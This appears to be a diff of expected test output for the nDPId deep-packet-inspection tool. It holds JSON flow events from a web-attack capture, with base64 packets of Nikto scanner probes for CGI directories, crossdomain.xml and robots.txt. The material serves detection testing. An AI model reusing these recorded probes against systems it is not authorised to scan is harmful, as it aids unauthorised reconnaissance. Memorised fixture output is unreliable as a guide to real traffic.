+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276727,"pkt":"AAAAAAAAAAAAAAAACABFAADFtaJAAEAGho5\/AAABfwAAAcHiH5DFGI2++SyH14AYAED+uQAAAQEICp1m+x+dZvsfR0VUIC9jZ2ktcGVybC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276728,"pkt":"AAAAAAAAAAAAAAAACABFAADFuPZAAEAGgzp\/AAABfwAAAcHkH5CSdoDrZ1cRi4AYAED+uQAAAQEICp1m+yCdZvsgR0VUIC9zY2dpLWJpbi8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276730,"pkt":"AAAAAAAAAAAAAAAACABFAADIS5pAAEAG8JN\/AAABfwAAAcHmH5DcbnOH9ynG7oAYAED+vAAAAQEICp1m+yKdZvsiR0VUIC9jZ2ktYmluLXNkYi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276733,"pkt":"AAAAAAAAAAAAAAAACABFAADE3RFAAEAGXyB\/AAABfwAAAcHoH5BtNeURIEAjc4AYAED+uAAAAQEICp1m+ySdZvskR0VUIC9jZ2ktbW9kLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1576420276734,"pkt":"AAAAAAAAAAAAAAAACABFAAC0+gVAAEAGQjx\/AAABfwAAAcHqH5Dwf8IdIiKU7IAYAED+qAAAAQEICp1m+yadZvsmR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnBhdGhzKQ0KDQo="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1576420276738,"pkt":"AAAAAAAAAAAAAAAACABFAADXryVAAEAGjPl\/AAABfwAAAcHsH5B635cEZT8z4YAYAED+ywAAAQEICp1m+yqdZvsqR0VUIC9jbGllbnRhY2Nlc3Nwb2xpY3kueG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjbGllbnRhY2Nlc3Nwb2xpY3kpDQoNCg=="} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276739,"pkt":"AAAAAAAAAAAAAAAACABFAADJlTdAAEAGpvV\/AAABfwAAAcHuH5Dvz60WkSjxAoAYAED+vQAAAQEICp1m+yudZvsrR0VUIC9jcm9zc2RvbWFpbi54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNyb3NzZG9tYWluKQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276741,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/JMVAAEAGF3J\/AAABfwAAAcHwH5DeWhzjQtAeBoAYAED+swAAAQEICp1m+yydZvssR0VUIC9yb2JvdHMudHh0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpyb2JvdHMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 